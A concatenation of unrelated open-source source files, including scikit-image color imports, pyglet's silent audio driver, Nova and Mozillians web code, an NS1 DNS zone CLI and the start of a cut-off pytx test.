:param str source_dir: Source directory containing pyproject.toml
:param str sdist_dir: Target directory to place sdist in
:param dict config_settings: Options to pass to build backend
This is a blocking function which will run pip in a subprocess to install
build requirements.
"""
if config_settings is None:
config_settings = {}
requires, backend, backend_path = _load_pyproject(source_dir)
hooks = Pep517HookCaller(source_dir, backend, backend_path)
with BuildEnvironment() as env:
env.pip_install(requires)
reqs = hooks.get_requires_for_build_sdist(config_settings)
env.pip_install(reqs)
return hooks.build_sdist(sdist_dir, config_settings)
| mit |
warmspringwinds/scikit-image | skimage/color/__init__.py | 28 | 3217 | from .colorconv import (convert_colorspace,
guess_spatial_dimensions,
rgb2hsv,
hsv2rgb,
rgb2xyz,
xyz2rgb,
rgb2rgbcie,
rgbcie2rgb,
rgb2grey,
rgb2gray,
gray2rgb,
xyz2lab,
lab2xyz,
lab2rgb,
rgb2lab,
xyz2luv,
luv2xyz,
luv2rgb,
rgb2luv,
rgb2hed,
hed2rgb,
lab2lch,
lch2lab,
separate_stains,
combine_stains,
rgb_from_hed,
hed_from_rgb,
rgb_from_hdx,
hdx_from_rgb,
rgb_from_fgx,
fgx_from_rgb,
rgb_from_bex,
bex_from_rgb,
rgb_from_rbd,
rbd_from_rgb,
rgb_from_gdx,
gdx_from_rgb,
rgb_from_hax,
hax_from_rgb,
rgb_from_bro,
bro_from_rgb,
rgb_from_bpx,
bpx_from_rgb,
rgb_from_ahx,
ahx_from_rgb,
rgb_from_hpx,
hpx_from_rgb)
from .colorlabel import color_dict, label2rgb
from .delta_e import (deltaE_cie76,
deltaE_ciede94,
deltaE_ciede2000,
deltaE_cmc,
)
__all__ = ['convert_colorspace',
'guess_spatial_dimensions',
'rgb2hsv',
'hsv2rgb',
'rgb2xyz',
'xyz2rgb',
'rgb2rgbcie',
'rgbcie2rgb',
'rgb2grey',
'rgb2gray',
'gray2rgb',
'xyz2lab',
'lab2xyz',
'lab2rgb',
'rgb2lab',
'rgb2hed',
'hed2rgb',
'lab2lch',
'lch2lab',
'separate_stains',
'combine_stains',
'rgb_from_hed',
'hed_from_rgb',
'rgb_from_hdx',
'hdx_from_rgb',
'rgb_from_fgx',
'fgx_from_rgb',
'rgb_from_bex',
'bex_from_rgb',
'rgb_from_rbd',
'rbd_from_rgb',
'rgb_from_gdx',
'gdx_from_rgb',
'rgb_from_hax',
'hax_from_rgb',
'rgb_from_bro',
'bro_from_rgb',
'rgb_from_bpx',
'bpx_from_rgb',
'rgb_from_ahx',
'ahx_from_rgb',
'rgb_from_hpx',
'hpx_from_rgb',
'color_dict',
'label2rgb',
'deltaE_cie76',
'deltaE_ciede94',
'deltaE_ciede2000',
'deltaE_cmc',
]
| bsd-3-clause |
OpenBfS/dokpool-plone | Plone/src/docpool.transfers/docpool/transfers/behaviors/transferstype.py | 1 | 3406 | # -*- coding: utf-8 -*-
#
# File: transferstype.py
#
# Copyright (c) 2016 by Bundesamt für Strahlenschutz
# Generator: ConPD2
# http://www.condat.de
#
__author__ = ''
__docformat__ = 'plaintext'
"""Definition of the TransfersType content type. See transferstype.py for more
explanation on the statements below.
"""
from Acquisition import aq_inner
from docpool.transfers import DocpoolMessageFactory as _
from docpool.transfers.db.query import allowed_targets
from plone.autoform.directives import widget
from plone.autoform.interfaces import IFormFieldProvider
from plone.supermodel import model
from Products.CMFPlone.utils import safe_unicode
from z3c.form.browser.checkbox import CheckBoxFieldWidget
from zope import schema
from zope.interface import provider
from zope.schema.interfaces import IContextSourceBinder
from zope.schema.vocabulary import SimpleTerm
from zope.schema.vocabulary import SimpleVocabulary
@provider(IContextSourceBinder)
def possible_targets_vocabulary_factory(dto):
targets = allowed_targets(dto)
return SimpleVocabulary([
SimpleTerm(t.id, t.id, safe_unicode(t)) for t in targets])
@provider(IFormFieldProvider)
class ITransfersType(model.Schema):
allowTransfer = schema.Bool(
title=_(
u'label_doctype_allowtransfer',
default=u'Can documents of this type be sent to other ESDs?',
),
description=_(u'description_doctype_allowtransfer', default=u''),
required=False,
default=True,
)
widget(automaticTransferTargets=CheckBoxFieldWidget)
automaticTransferTargets = schema.List(
title=_(
u'label_doctype_automatictransfertargets',
default=u'Where are documents of this type transfered automatically?',
),
description=_(
u'description_doctype_automatictransfertargets', default=u''),
required=False,
value_type=schema.Choice(
title=_(u'Transfer target'),
source=possible_targets_vocabulary_factory,
),
)
class TransfersType(object):
"""
"""
def __init__(self, context):
self.context = context
@property
def allowTransfer(self):
return getattr(self.context, "allowTransfer", True)
@allowTransfer.setter
def allowTransfer(self, value):
context = aq_inner(self.context)
context.allowTransfer = value
@property
def automaticTransferTargets(self):
value = set(getattr(self.context, 'automaticTransferTargets', ()))
if not value:
# avoid unnecessary interaction with the zope.sqlalchemy datamanager
return []
allowed = {target.id: target for target in allowed_targets(self.context)}
return sorted(
value.intersection(allowed),
key=lambda tid: safe_unicode(allowed[tid])
)
@automaticTransferTargets.setter
def automaticTransferTargets(self, value):
try:
self.context.myDocumentPool()
except AttributeError:
return
context = aq_inner(self.context)
unaffected = set(getattr(context, 'automaticTransferTargets', ()))
if unaffected:
allowed = (target.id for target in allowed_targets(context))
unaffected.difference_update(allowed)
context.automaticTransferTargets = tuple(unaffected.union(value))
| gpl-3.0 |
naresh21/synergetics-edx-platform | cms/djangoapps/contentstore/management/commands/reindex_library.py | 155 | 2604 | """ Management command to update libraries' search index """
from django.core.management import BaseCommand, CommandError
from optparse import make_option
from textwrap import dedent
from contentstore.courseware_index import LibrarySearchIndexer
from opaque_keys.edx.keys import CourseKey
from opaque_keys import InvalidKeyError
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys.edx.locator import LibraryLocator
from .prompt import query_yes_no
from xmodule.modulestore.django import modulestore
class Command(BaseCommand):
"""
Command to reindex content libraries (single, multiple or all available)
Examples:
./manage.py reindex_library lib1 lib2 - reindexes libraries with keys lib1 and lib2
./manage.py reindex_library --all - reindexes all available libraries
"""
help = dedent(__doc__)
can_import_settings = True
args = "<library_id library_id ...>"
option_list = BaseCommand.option_list + (
make_option(
'--all',
action='store_true',
dest='all',
default=False,
help='Reindex all libraries'
),)
CONFIRMATION_PROMPT = u"Reindexing all libraries might be a time consuming operation. Do you want to continue?"
def _parse_library_key(self, raw_value):
""" Parses library key from string """
try:
result = CourseKey.from_string(raw_value)
except InvalidKeyError:
result = SlashSeparatedCourseKey.from_deprecated_string(raw_value)
if not isinstance(result, LibraryLocator):
raise CommandError(u"Argument {0} is not a library key".format(raw_value))
return result
def handle(self, *args, **options):
"""
By convention set by django developers, this method actually executes command's actions.
So, there could be no better docstring than emphasize this once again.
"""
if len(args) == 0 and not options.get('all', False):
raise CommandError(u"reindex_library requires one or more arguments: <library_id>")
store = modulestore()
if options.get('all', False):
if query_yes_no(self.CONFIRMATION_PROMPT, default="no"):
library_keys = [library.location.library_key.replace(branch=None) for library in store.get_libraries()]
else:
return
else:
library_keys = map(self._parse_library_key, args)
for library_key in library_keys:
LibrarySearchIndexer.do_library_reindex(store, library_key)
| agpl-3.0 |
theblacklion/pyglet | pyglet/media/drivers/silent.py | 33 | 7717 | #!/usr/bin/env python
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import time
from pyglet.media import AbstractAudioPlayer, AbstractAudioDriver, \
MediaThread, MediaEvent
import pyglet
_debug = pyglet.options['debug_media']
class SilentAudioPacket(object):
def __init__(self, timestamp, duration):
self.timestamp = timestamp
self.duration = duration
def consume(self, dt):
self.timestamp += dt
self.duration -= dt
class SilentAudioPlayerPacketConsumer(AbstractAudioPlayer):
# When playing video, length of audio (in secs) to buffer ahead.
_buffer_time = 0.4
# Minimum number of bytes to request from source
_min_update_bytes = 1024
# Maximum sleep time
_sleep_time = 0.2
def __init__(self, source_group, player):
super(SilentAudioPlayerPacketConsumer, self).__init__(source_group, player)
# System time of first timestamp
self._timestamp_time = None
# List of buffered SilentAudioPacket
self._packets = []
self._packets_duration = 0
self._events = []
# Actual play state.
self._playing = False
# TODO Be nice to avoid creating this thread if user doesn't care
# about EOS events and there's no video format.
# NOTE Use thread.condition as lock for all instance vars used by worker
self._thread = MediaThread(target=self._worker_func)
if source_group.audio_format:
self._thread.start()
def delete(self):
if _debug:
print 'SilentAudioPlayer.delete'
self._thread.stop()
def play(self):
if _debug:
print 'SilentAudioPlayer.play'
self._thread.condition.acquire()
if not self._playing:
self._playing = True
self._timestamp_time = time.time()
self._thread.condition.notify()
self._thread.condition.release()
def stop(self):
if _debug:
print 'SilentAudioPlayer.stop'
self._thread.condition.acquire()
if self._playing:
timestamp = self.get_time()
if self._packets:
packet = self._packets[0]
self._packets_duration -= timestamp - packet.timestamp
packet.consume(timestamp - packet.timestamp)
self._playing = False
self._thread.condition.release()
def clear(self):
if _debug:
print 'SilentAudioPlayer.clear'
self._thread.condition.acquire()
del self._packets[:]
self._packets_duration = 0
del self._events[:]
self._thread.condition.release()
def get_time(self):
if _debug:
print 'SilentAudioPlayer.get_time()'
self._thread.condition.acquire()
packets = self._packets
if self._playing:
# Consume timestamps
result = None
offset = time.time() - self._timestamp_time
while packets:
packet = packets[0]
if offset > packet.duration:
del packets[0]
self._timestamp_time += packet.duration
offset -= packet.duration
self._packets_duration -= packet.duration
else:
packet.consume(offset)
self._packets_duration -= offset
self._timestamp_time += offset
result = packet.timestamp
break
else:
# Paused
if packets:
result = packets[0].timestamp
else:
result = None
self._thread.condition.release()
if _debug:
print 'SilentAudioPlayer.get_time() -> ', result
return result
# Worker func that consumes audio data and dispatches events
def _worker_func(self):
thread = self._thread
#buffered_time = 0
eos = False
events = self._events
while True:
thread.condition.acquire()
if thread.stopped or (eos and not events):
thread.condition.release()
break
# Use up "buffered" audio based on amount of time passed.
timestamp = self.get_time()
if _debug:
print 'timestamp: %r' % timestamp
# Dispatch events
while events and timestamp is not None:
if (events[0].timestamp is None or
events[0].timestamp <= timestamp):
events[0]._sync_dispatch_to_player(self.player)
del events[0]
# Calculate how much data to request from source
secs = self._buffer_time - self._packets_duration
bytes = secs * self.source_group.audio_format.bytes_per_second
if _debug:
print 'Trying to buffer %d bytes (%r secs)' % (bytes, secs)
while bytes > self._min_update_bytes and not eos:
# Pull audio data from source
audio_data = self.source_group.get_audio_data(int(bytes))
if not audio_data and not eos:
events.append(MediaEvent(timestamp, 'on_eos'))
events.append(MediaEvent(timestamp, 'on_source_group_eos'))
eos = True
break
# Pretend to buffer audio data, collect events.
if self._playing and not self._packets:
self._timestamp_time = time.time()
self._packets.append(SilentAudioPacket(audio_data.timestamp,
audio_data.duration))
self._packets_duration += audio_data.duration
for event in audio_data.events:
event.timestamp += audio_data.timestamp
events.append(event)
events.extend(audio_data.events)
bytes -= audio_data.length
sleep_time = self._sleep_time
if not self._playing:
sleep_time = None
elif events and events[0].timestamp and timestamp:
sleep_time = min(sleep_time, events[0].timestamp - timestamp)
if _debug:
print 'SilentAudioPlayer(Worker).sleep', sleep_time
thread.sleep(sleep_time)
thread.condition.release()
class SilentTimeAudioPlayer(AbstractAudioPlayer):
# Note that when using this player (automatic if playing back video with
# unsupported audio codec) no events are dispatched (because they are
# normally encoded in the audio packet -- so no EOS events are delivered.
# This is a design flaw.
#
# Also, seeking is broken because the timestamps aren't synchronized with
# the source group.
_time = 0.0
_systime = None
def play(self):
self._systime = time.time()
def stop(self):
self._time = self.get_time()
self._systime = None
def delete(self):
pass
def clear(self):
pass
def get_time(self):
if self._systime is None:
return self._time
else:
return time.time() - self._systime + self._time
class SilentAudioDriver(AbstractAudioDriver):
def create_audio_player(self, source_group, player):
if source_group.audio_format:
return SilentAudioPlayerPacketConsumer(source_group, player)
else:
return SilentTimeAudioPlayer(source_group, player)
def create_audio_driver():
return SilentAudioDriver()
| bsd-3-clause |
watonyweng/nova | nova/api/openstack/compute/legacy_v2/contrib/extended_ips_mac.py | 79 | 3077 | # Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The Extended Ips API extension."""
import itertools
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
authorize = extensions.soft_extension_authorizer('compute', 'extended_ips_mac')
class ExtendedIpsMacController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(ExtendedIpsMacController, self).__init__(*args, **kwargs)
def _extend_server(self, context, server, instance):
key = "%s:mac_addr" % Extended_ips_mac.alias
networks = common.get_networks_for_instance(context, instance)
for label, network in networks.items():
# NOTE(vish): ips are hidden in some states via the
# hide_server_addresses extension.
if label in server['addresses']:
all_ips = itertools.chain(network["ips"],
network["floating_ips"])
for i, ip in enumerate(all_ips):
server['addresses'][label][i][key] = ip['mac_address']
@wsgi.extends
def show(self, req, resp_obj, id):
context = req.environ['nova.context']
if authorize(context):
server = resp_obj.obj['server']
db_instance = req.get_db_instance(server['id'])
# server['id'] is guaranteed to be in the cache due to
# the core API adding it in its 'show' method.
self._extend_server(context, server, db_instance)
@wsgi.extends
def detail(self, req, resp_obj):
context = req.environ['nova.context']
if authorize(context):
servers = list(resp_obj.obj['servers'])
for server in servers:
db_instance = req.get_db_instance(server['id'])
# server['id'] is guaranteed to be in the cache due to
# the core API adding it in its 'detail' method.
self._extend_server(context, server, db_instance)
class Extended_ips_mac(extensions.ExtensionDescriptor):
"""Adds mac address parameter to the ip list."""
name = "ExtendedIpsMac"
alias = "OS-EXT-IPS-MAC"
namespace = ("http://docs.openstack.org/compute/ext/"
"extended_ips_mac/api/v1.1")
updated = "2013-03-07T00:00:00Z"
def get_controller_extensions(self):
controller = ExtendedIpsMacController()
extension = extensions.ControllerExtension(self, 'servers', controller)
return [extension]
| apache-2.0 |
brian-yang/mozillians | mozillians/groups/views.py | 2 | 15815 | import json
from collections import defaultdict
from django.conf import settings
from django.contrib import messages
from django.core.paginator import EmptyPage, Paginator, PageNotAnInteger
from django.db.models import Q
from django.http import HttpResponse, HttpResponseBadRequest, Http404
from django.shortcuts import get_object_or_404, redirect, render
from django.views.decorators.cache import cache_control, never_cache
from django.views.decorators.http import require_POST
from funfactory.urlresolvers import reverse
from mozillians.users.models import UserProfile
from tower import ugettext as _
from mozillians.common.decorators import allow_unvouched
from mozillians.common.helpers import get_object_or_none
from mozillians.groups.forms import (GroupForm, TermsReviewForm,
MembershipFilterForm, SortForm,
SuperuserGroupForm)
from mozillians.groups.models import Group, Skill, GroupMembership
def _list_groups(request, template, query):
"""Lists groups from given query."""
sort_form = SortForm(request.GET)
show_pagination = False
if sort_form.is_valid():
query = query.order_by(sort_form.cleaned_data['sort'], 'name')
else:
query = query.order_by('name')
paginator = Paginator(query, settings.ITEMS_PER_PAGE)
page = request.GET.get('page', 1)
try:
groups = paginator.page(page)
except PageNotAnInteger:
groups = paginator.page(1)
except EmptyPage:
groups = paginator.page(paginator.num_pages)
if paginator.count > settings.ITEMS_PER_PAGE:
show_pagination = True
data = dict(groups=groups, page=page, sort_form=sort_form, show_pagination=show_pagination)
return render(request, template, data)
def index_groups(request):
"""Lists all public groups (in use) on Mozillians.
Doesn't list functional areas, invisible groups, and groups with
no vouched members
"""
query = Group.get_non_functional_areas()
template = 'groups/index_groups.html'
return _list_groups(request, template, query)
def index_skills(request):
"""Lists all public skills (in use) on Mozillians."""
query = Skill.objects.filter(members__is_vouched=True)
template = 'groups/index_skills.html'
return _list_groups(request, template, query)
def index_functional_areas(request):
"""Lists all functional areas."""
query = Group.get_functional_areas()
template = 'groups/index_areas.html'
return _list_groups(request, template, query)
@allow_unvouched
@cache_control(must_revalidate=True, max_age=3600)
def search(request, searched_object=Group):
"""Simple wildcard search for a group using a GET parameter.
Used for group/skill auto-completion.
"""
term = request.GET.get('term', None)
if request.is_ajax() and term:
groups = searched_object.search(term).values_list('name', flat=True)
return HttpResponse(json.dumps(list(groups)),
content_type='application/json')
return HttpResponseBadRequest()
@never_cache
def show(request, url, alias_model, template):
"""List all members in this group."""
group_alias = get_object_or_404(alias_model, url=url)
if group_alias.alias.url != url:
return redirect('groups:show_group', url=group_alias.alias.url)
is_curator = False
is_manager = request.user.userprofile.is_manager
is_pending = False
show_delete_group_button = False
membership_filter_form = MembershipFilterForm(request.GET)
group = group_alias.alias
profile = request.user.userprofile
in_group = group.has_member(profile)
memberships = group.members.all()
data = {}
if isinstance(group, Group):
# Has the user accepted the group terms
if group.terms:
membership = get_object_or_none(GroupMembership, group=group, userprofile=profile,
status=GroupMembership.PENDING_TERMS)
if membership:
return redirect(reverse('groups:review_terms', args=[group.url]))
# Is this user's membership pending?
is_pending = group.has_pending_member(profile)
is_curator = is_manager or (request.user.userprofile in group.curators.all())
# initialize the form only when the group is moderated and user is curator of the group
if is_curator and group.accepting_new_members == 'by_request':
membership_filter_form = MembershipFilterForm(request.GET)
else:
membership_filter_form = None
if is_curator:
statuses = [GroupMembership.MEMBER, GroupMembership.PENDING]
if membership_filter_form and membership_filter_form.is_valid():
filtr = membership_filter_form.cleaned_data['filtr']
if filtr == 'members':
statuses = [GroupMembership.MEMBER]
elif filtr == 'pending_members':
statuses = [GroupMembership.PENDING]
memberships = group.groupmembership_set.filter(status__in=statuses)
# Curators can delete their group if there are no other members.
show_delete_group_button = is_curator and group.members.all().count() == 1
else:
# only show full members, or this user
memberships = group.groupmembership_set.filter(
Q(status=GroupMembership.MEMBER) | Q(userprofile=profile))
# Order by UserProfile.Meta.ordering
memberships = memberships.order_by('userprofile')
# Find the most common skills of the group members.
# Order by popularity in the group.
shared_skill_ids = (group.members.filter(groupmembership__status=GroupMembership.MEMBER)
.values_list('skills', flat=True))
count_skills = defaultdict(int)
for skill_id in shared_skill_ids:
count_skills[skill_id] += 1
common_skills_ids = [k for k, v in sorted(count_skills.items(),
key=lambda x: x[1],
reverse=True)
if count_skills[k] > 1]
# Translate ids to Skills preserving order.
skills = [Skill.objects.get(id=skill_id) for skill_id in common_skills_ids if skill_id]
data.update(skills=skills, membership_filter_form=membership_filter_form)
page = request.GET.get('page', 1)
paginator = Paginator(memberships, settings.ITEMS_PER_PAGE)
try:
people = paginator.page(page)
except PageNotAnInteger:
people = paginator.page(1)
except EmptyPage:
people = paginator.page(paginator.num_pages)
show_pagination = paginator.count > settings.ITEMS_PER_PAGE
extra_data = dict(people=people,
group=group,
in_group=in_group,
is_curator=is_curator,
is_pending=is_pending,
show_pagination=show_pagination,
show_delete_group_button=show_delete_group_button,
show_join_button=group.user_can_join(request.user.userprofile),
show_leave_button=group.user_can_leave(request.user.userprofile),
members=group.member_count,
)
data.update(extra_data)
return render(request, template, data)
def remove_member(request, url, user_pk):
group = get_object_or_404(Group, url=url)
profile_to_remove = get_object_or_404(UserProfile, pk=user_pk)
this_userprofile = request.user.userprofile
is_curator = (this_userprofile in group.curators.all())
is_manager = request.user.userprofile.is_manager
group_url = reverse('groups:show_group', args=[group.url])
next_url = request.REQUEST.get('next_url', group_url)
# TODO: this duplicates some of the logic in Group.user_can_leave(), but we
# want to give the user a message that's specific to the reason they can't leave.
# Can we make this DRYer?
# You can remove yourself, if group allows it. Curator and superuser can remove anyone.
if not (is_curator or is_manager):
if not group.members_can_leave:
messages.error(request, _('This group does not allow members to remove themselves.'))
return redirect(next_url)
if profile_to_remove != this_userprofile:
raise Http404()
# Curators cannot be removed, only by themselves and if there is another curator.
curators = group.curators.all()
if (profile_to_remove in curators and curators.count() <= 1 and
profile_to_remove != this_userprofile):
messages.error(request, _('The group needs at least one curator.'))
return redirect(next_url)
if request.method == 'POST':
group.remove_member(profile_to_remove,
send_email=(profile_to_remove != this_userprofile))
if profile_to_remove in curators:
group.curators.remove(profile_to_remove)
if this_userprofile == profile_to_remove:
messages.info(request, _('You have been removed from this group.'))
else:
messages.info(request, _('The group member has been removed.'))
return redirect(next_url)
# Display confirmation page
context = {
'group': group,
'profile': profile_to_remove,
'next_url': next_url
}
return render(request, 'groups/confirm_remove_member.html', context)
@require_POST
def confirm_member(request, url, user_pk):
"""
Add a member to a group who has requested membership.
"""
group = get_object_or_404(Group, url=url)
profile = get_object_or_404(UserProfile, pk=user_pk)
is_curator = (request.user.userprofile in group.curators.all())
is_manager = request.user.userprofile.is_manager
group_url = reverse('groups:show_group', args=[group.url])
next_url = request.REQUEST.get('next_url', group_url)
if not (is_curator or is_manager):
raise Http404()
try:
membership = GroupMembership.objects.get(group=group, userprofile=profile)
except GroupMembership.DoesNotExist:
messages.error(request, _('This user has not requested membership in this group.'))
else:
if membership.status == GroupMembership.MEMBER:
messages.error(request, _('This user is already a member of this group.'))
else:
status = GroupMembership.MEMBER
if group.terms:
status = GroupMembership.PENDING_TERMS
group.add_member(profile, status=status)
messages.info(request, _('This user has been added as a member of this group.'))
return redirect(next_url)
def edit(request, url, alias_model, template):
return render(request, alias_model, template)
def review_terms(request, url):
"""Review group terms page."""
group = get_object_or_404(Group, url=url)
if not group.terms:
return redirect(reverse('groups:show_group', args=[group.url]))
membership = get_object_or_404(GroupMembership, group=group,
userprofile=request.user.userprofile,
status=GroupMembership.PENDING_TERMS)
membership_form = TermsReviewForm(request.POST or None)
if membership_form.is_valid():
if membership_form.cleaned_data['terms_accepted'] == 'True':
group.add_member(request.user.userprofile, GroupMembership.MEMBER)
else:
membership.delete()
return redirect(reverse('groups:show_group', args=[group.url]))
ctx = {
'group': group,
'membership_form': membership_form
}
return render(request, 'groups/terms.html', ctx)
@require_POST
def join_group(request, url):
"""User request to join group."""
group = get_object_or_404(Group, url=url)
profile_to_add = request.user.userprofile
# TODO: this duplicates some of the logic in Group.user_can_join(), but we
# want to give the user a message that's specific to the reason they can't join.
# Can we make this DRYer?
if group.has_member(profile_to_add):
messages.error(request, _('You are already in this group.'))
elif group.has_pending_member(profile_to_add):
messages.error(request, _('Your request to join this group is still pending.'))
elif group.accepting_new_members == 'no':
messages.error(request, _('This group is not accepting requests to join.'))
else:
if group.accepting_new_members == 'yes':
status = GroupMembership.MEMBER
messages.info(request, _('You have been added to this group.'))
if group.terms:
status = GroupMembership.PENDING_TERMS
elif group.accepting_new_members == 'by_request':
status = GroupMembership.PENDING
messages.info(request, _('Your membership request has been sent '
'to the group curator(s).'))
group.add_member(profile_to_add, status=status)
return redirect(reverse('groups:show_group', args=[group.url]))
@require_POST
def toggle_skill_subscription(request, url):
"""Toggle the current user's membership of a group."""
skill = get_object_or_404(Skill, url=url)
profile = request.user.userprofile
if profile.skills.filter(id=skill.id).exists():
profile.skills.remove(skill)
else:
profile.skills.add(skill)
return redirect(reverse('groups:show_skill', args=[skill.url]))
@require_POST
def group_delete(request, url):
profile = request.user.userprofile
# Get the group to delete
group = get_object_or_404(Group, url=url)
# Only a group curator is allowed to delete a group
is_curator = profile in group.curators.all()
if not is_curator and not profile.is_manager:
messages.error(request, _('You must be a curator to delete a group'))
return redirect(reverse('groups:show_group', args=[group.url]))
# Cannot delete if anyone else is in it
if group.members.all().count() != 1:
messages.error(request, _('You cannot delete a group if anyone else is in it.'))
return redirect(reverse('groups:show_group', args=[group.url]))
# Go to it
group.delete()
messages.info(request, _('Group %s has been deleted') % group.name)
return redirect(reverse('groups:index_groups'))
@never_cache
def group_add_edit(request, url=None):
"""
Add or edit a group. (If a url is passed in, we're editing.)
"""
profile = request.user.userprofile
is_manager = request.user.userprofile.is_manager
if url:
# Get the group to edit
group = get_object_or_404(Group, url=url)
# Only a group curator or an admin is allowed to edit a group
is_curator = profile in group.curators.all()
if not (is_curator or is_manager):
messages.error(request, _('You must be a curator or an admin to edit a group'))
return redirect(reverse('groups:show_group', args=[group.url]))
else:
group = Group()
form_class = SuperuserGroupForm if is_manager else GroupForm
curators_ids = [profile.id]
if url:
curators_ids += group.curators.all().values_list('id', flat=True)
form = form_class(request.POST or None, instance=group,
initial={'curators': curators_ids})
if form.is_valid():
group = form.save()
return redirect(reverse('groups:show_group', args=[group.url]))
context = {
'form': form,
'creating': url is None,
'group': group if url else None
}
return render(request, 'groups/add_edit.html', context)
| bsd-3-clause |
ns1/nsone-cli | ns1cli/commands/cmd_zone.py | 3 | 7144 | import click
from ns1cli.cli import cli, write_options
from ns1cli.util import Formatter
from nsone.rest.resource import ResourceException
class ZoneFormatter(Formatter):
def print_zone(self, zdata):
records = zdata.pop('records')
self.pretty_print(zdata)
if len(records) == 0:
click.secho('NO RECORDS', bold=True)
return
click.secho('RECORDS:', bold=True)
longestRec = self._longest([r['domain'] for r in records])
for r in records:
self.out(' %s %s %s' % (r['domain'].ljust(longestRec),
r['type'].ljust(5),
', '.join(r['short_answers'])))
@click.group('zone',
short_help='View and modify zone soa data')
@click.pass_context
def cli(ctx):
"""Create, retrieve, update, and delete zone SOA data"""
ctx.obj.formatter = ZoneFormatter(ctx.obj.get_config('output_format'))
ctx.obj.zone_api = ctx.obj.rest.zones()
@cli.command('list', short_help='List all active zones')
@click.pass_context
def list(ctx):
"""Returns all active zones and basic zone configuration details
for each.
\b
EXAMPLES:
zone list
"""
try:
zlist = ctx.obj.zone_api.list()
except ResourceException as e:
raise click.ClickException('REST API: %s' % e.message)
else:
if ctx.obj.formatter.output_format == 'json':
ctx.obj.formatter.out_json(zlist)
return
click.secho('ZONES:', bold=True)
for z in zlist:
ctx.obj.formatter.out(' ' + z['zone'])
@cli.command('info', short_help='Get zone details')
@click.argument('zone')
@click.pass_context
def info(ctx, zone):
"""Returns a single active ZONE and its basic configuration details.
For convenience, a list of records in the ZONE, and some basic details
of each record, is also included.
\b
EXAMPLES:
zone info test.com
"""
try:
zdata = ctx.obj.zone_api.retrieve(zone)
except ResourceException as e:
raise click.ClickException('REST API: %s' % e.message)
else:
if ctx.obj.formatter.output_format == 'json':
ctx.obj.formatter.out_json(zdata)
return
ctx.obj.formatter.print_zone(zdata)
@cli.command('create', short_help='Create a new zone')
@click.argument('zone')
@write_options
@click.option('--link', help='Create linked zone pointing to given zone', type=str)
@click.option('--refresh', help='SOA Refresh', type=int)
@click.option('--retry', help='SOA Retry', type=int)
@click.option('--expiry', help='SOA Expiry', type=int)
@click.option('--nx_ttl', help='SOA NX TTL', type=int)
@click.pass_context
def create(ctx, nx_ttl, expiry, retry, refresh, link, zone):
"""Creates a new DNS ZONE. You must include at minimum the ZONE domain name.
\b
ZONE TYPES:
1) standard zone (which has its own configuration and records)
2) linked zone (which points to an existing standard zone, reusing its
configuration and records)
\b
EXAMPLES:
zone create test.com
zone create --link test.com linked.com
zone create --nx_ttl 300 with.option
zone create --nx_ttl=300 with.option
\b
LINKED ZONES:
For non-linked zones, you may specify optional zone configuration by including
ttl (SOA record TTL), refresh, retry, expiry, and nx_ttl values, as in a SOA record.
The zone is assigned DNS servers and appropriate NS records are automatically created,
unless you create a secondary zone.
To create a linked ZONE, you must include the --link option. It must be a string which
references the TARGET zone (domain name) to link to. The TARGET zone must be owned by
the same account that is creating the linked ZONE. If the link property is specified,
no other zone configuration properties (such as refresh, retry, etc) may be specified,
since they are all pulled from the TARGET zone. Linked zones, once created, cannot be
configured at all and cannot have records added to them. They may only be deleted,
which does not affect the TARGET zone at all.
"""
ctx.obj.check_write_lock()
options = {}
if nx_ttl:
options['nx_ttl'] = nx_ttl
if expiry:
options['expiry'] = expiry
if retry:
options['retry'] = retry
if refresh:
options['refresh'] = refresh
if link:
if options:
raise click.UsageError('Cannot create linked zone with options besides the link source')
options['link'] = link
try:
zdata = ctx.obj.zone_api.create(zone, **options)
except ResourceException as e:
raise click.ClickException('REST API: %s' % e.message)
else:
if ctx.obj.formatter.output_format == 'json':
ctx.obj.formatter.out_json(zdata)
return
ctx.obj.formatter.print_zone(zdata)
@cli.command('set', short_help='Update zone attributes')
@click.argument('zone')
@write_options
@click.option('--refresh', help='SOA Refresh', type=int)
@click.option('--retry', help='SOA Retry', type=int)
@click.option('--expiry', help='SOA Expiry', type=int)
@click.option('--nx_ttl', help='SOA NX TTL', type=int)
@write_options
@click.pass_context
def set(ctx, nx_ttl, expiry, retry, refresh, zone):
"""Modify basic details of a DNS ZONE. Details include ttl (SOA record TTL),
refresh, retry, expiry, or nx_ttl values, as in a SOA record.
You may not change the ZONE name or other details.
\b
EXAMPLES:
zone set --nt_ttl 200 --retry 5 test.com
zone set -f --expiry 100 test.com
"""
ctx.obj.check_write_lock()
options = {}
if nx_ttl:
options['nx_ttl'] = nx_ttl
if expiry:
options['expiry'] = expiry
if retry:
options['retry'] = retry
if refresh:
options['refresh'] = refresh
if not options:
raise click.UsageError('Updating zone requires at least one option')
try:
zdata = ctx.obj.zone_api.update(zone, **options)
except ResourceException as e:
raise click.ClickException('REST API: %s' % e.message)
else:
if ctx.obj.formatter.output_format == 'json':
ctx.obj.formatter.out_json(zdata)
return
ctx.obj.formatter.print_zone(zdata)
@cli.command('delete',
short_help='Delete a zone and all records it contains')
@click.argument('zone')
@write_options
@click.pass_context
def delete(ctx, zone):
"""Destroys an existing DNS ZONE and all records in the ZONE.
NS1 servers won't respond to queries for the zone or any of the records
after you do this, and you cannot recover the deleted ZONE, so be careful!
\b
EXAMPLES:
zone delete test.com
zone delete -f test.com
"""
ctx.obj.check_write_lock()
try:
ctx.obj.zone_api.delete(zone)
except ResourceException as e:
raise click.ClickException('REST API: %s' % e.message)
else:
click.echo('{} deleted'.format(zone))
| mit |
arirubinstein/ThreatExchange | tests/access_token_test.py | 1 | 2660 | from contextlib import nested
from mock import patch
import pytest
from pytx import access_token
from pytx.errors import pytxInitError
from pytx.vocabulary import ThreatExchange as te
class TestInit:
def verify_token(self, expected_token):
assert expected_token == access_token.get_access_token()
def test_no_token(self):
with nested(
pytest.raises(pytxInitError),
patch('pytx.access_token._find_token_file', return_value=None)
):
